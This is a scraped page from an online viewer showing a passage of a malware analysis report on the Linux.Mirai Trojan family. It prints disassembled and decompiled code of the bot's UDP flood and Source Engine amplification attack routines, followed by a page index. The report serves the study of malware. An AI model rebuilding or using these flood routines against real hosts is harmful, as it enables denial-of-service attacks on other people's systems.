Investigation of Linux.Mirai Trojan family

More documents

Recommendations

Info

32 32 .text:0804AE31 push eax .text:0804AE32 push eax .text:0804AE33 mov eax, dword ptr [esp+64h +size_<strong>of</strong>_packet] .text:0804AE37 and eax, 0FFFFh .text:0804AE3C push eax ; a2 .text:0804AE3D lea eax, [esi+ipudp_0.data] .text:0804AE40 push eax ; a1 .text:0804AE41 call fillBufRandom .text:0804AE46 add esp, 10h .text:0804AE49 jmp send_packet Then the <strong>Trojan</strong> counts checksums and shifts its attention to the next target. This procedure continues until the process is terminated: ; CODE XREF: cm- .text:0804AD1C send_packet: d0_udp_random+36Bj .text:0804AD1C +389j .text:0804AD1C mov word ptr [esi+0Ah], 0 .text:0804AD22 push eax .text:0804AD23 push eax .text:0804AD24 push 14h .text:0804AD26 push esi .text:0804AD27 call calcIPCheckSum .text:0804AD2C mov [esi+0Ah], ax .text:0804AD30 mov word ptr [edi+6], 0 .text:0804AD36 push ebx ; a4 .text:0804AD37 mov ax, [edi+4] .text:0804AD3B and eax, 0FFFFh .text:0804AD40 push eax ; a3 .text:0804AD41 push edi ; a2 .text:0804AD42 push esi ; a1 .text:0804AD43 call calcUDPChecksum .text:0804AD48 mov [edi+6], ax .text:0804AD4C mov eax, [esp+7Ch+counter] .text:0804AD50 mov ecx, [esp+7Ch+targets] .text:0804AD57 mov dx, [edi+2] .text:0804AD5B lea eax, [eax+eax*2] ; cmd0_udp_random
33 33 .text:0804AD5E add esp, 18h .text:0804AD61 shl eax, 3 .text:0804AD64 mov [eax+ecx+0Ah], dx .text:0804AD69 lea eax, [ecx+eax+8] .text:0804AD6D push 10h .text:0804AD6F push eax .text:0804AD70 push 4000h .text:0804AD75 push ebp .text:0804AD76 push esi .text:0804AD77 mov esi, [esp+78h+fd] .text:0804AD7B push esi .text:0804AD7C call ___libc_sendto .text:0804AD81 mov eax, [esp+7Ch+counter] .text:0804AD85 inc eax .text:0804AD86 mov [esp+7Ch+counter], eax .text:0804AD8A add esp, 20h .text:0804AD8D cmp eax, [esp+5Ch+target_count_2] .text:0804AD91 jl send_to_next_target .text:0804AD97 mov ecx, [esp+5Ch+target_count_2] .text:0804AD9B test ecx, ecx .text:0804AD9D jmp and_again cmd1 – Source Engine Amplification It operates like the previous command; however, the packet’s content is retrieved from the configuration: TOS = getNumberOrDefault(params_count, params, 2, 0); ident = getNumberOrDefault(params_count, params, 3, 0xFFFF); TTL = getNumberOrDefault(params_count, params, 4, 64); frag = getNumberOrDefault(params_count, params, 5, 0); sport = getNumberOrDefault(params_count, params, 6, 0xFFFF); dport = getNumberOrDefault(params_count, params, 7, 27015); //constant by default tsource = (char *)get_data_from_config(8); // get "TSource Engine Query"
Page 1 and 2: Investigation of Linux.Mirai Trojan
Page 3 and 4: 3 3 Introduction A Trojan for Linux
Page 5 and 6: 5 5 v1[1] = XX; v1[2] = XX; v1[3] =
Page 7 and 8: 7 7 Number Data type Value Purpose
Page 9 and 10: 9 9 .text:08048206 mov ds:Q[ecx*4],
Page 11 and 12: 11 11 .text:0804B03C mov dword ptr
Page 13 and 14: 13 13 .text:0804B1FB push 0 ; flags
Page 15 and 16: 15 15 .text:0804B3C1 call ___libc_w
Page 17 and 18: 17 17 .text:0804B4A4 push eax ; int
Page 19 and 20: 19 19 .text:0804B674 push offset a2
Page 21 and 22: 21 21 .text:0804B529 push 4000h ; i
Page 23 and 24: 23 23 } char * data; Code to initia
Page 25 and 26: 25 25 .text:0804BB16 test bl, bl .t
Page 27 and 28: 27 27 setsid(); sleep(time); kill(v
Page 29 and 30: 29 29 The getNumberOrDefault functi
Page 31: 31 31 v9 = __ROR2__(sport, 8); curr
Page 35 and 36: 35 35 .text:0804A50F xor ecx, ecx .
Page 37 and 38: 37 37 In addition, TCP parameters w
Page 39 and 40: 39 39 .text:08048F6D mov eax, [esp+
Page 41 and 42: 41 41 Linux.DDoS.89 SHA1: 846b2d1b0
Page 43 and 44: 43 43 } } else { v8 = 0; while ( ++
Page 45 and 46: 45 45 { } decode(4u); decode(5u); c
Page 47 and 48: 47 47 } else { result = __GI_listen
Page 49 and 50: 49 49 Number Decrypted value Purpos
Page 51 and 52: 51 51 .text:0804C218 push 9 ; sig .
Page 53 and 54: 53 53 Number Value Purpose 16 "zoll
Page 55 and 56: 55 55 Next, the Trojan calculates a

Investigation of Linux.Mirai Trojan family

Create successful ePaper yourself

Delete template?

Save as template?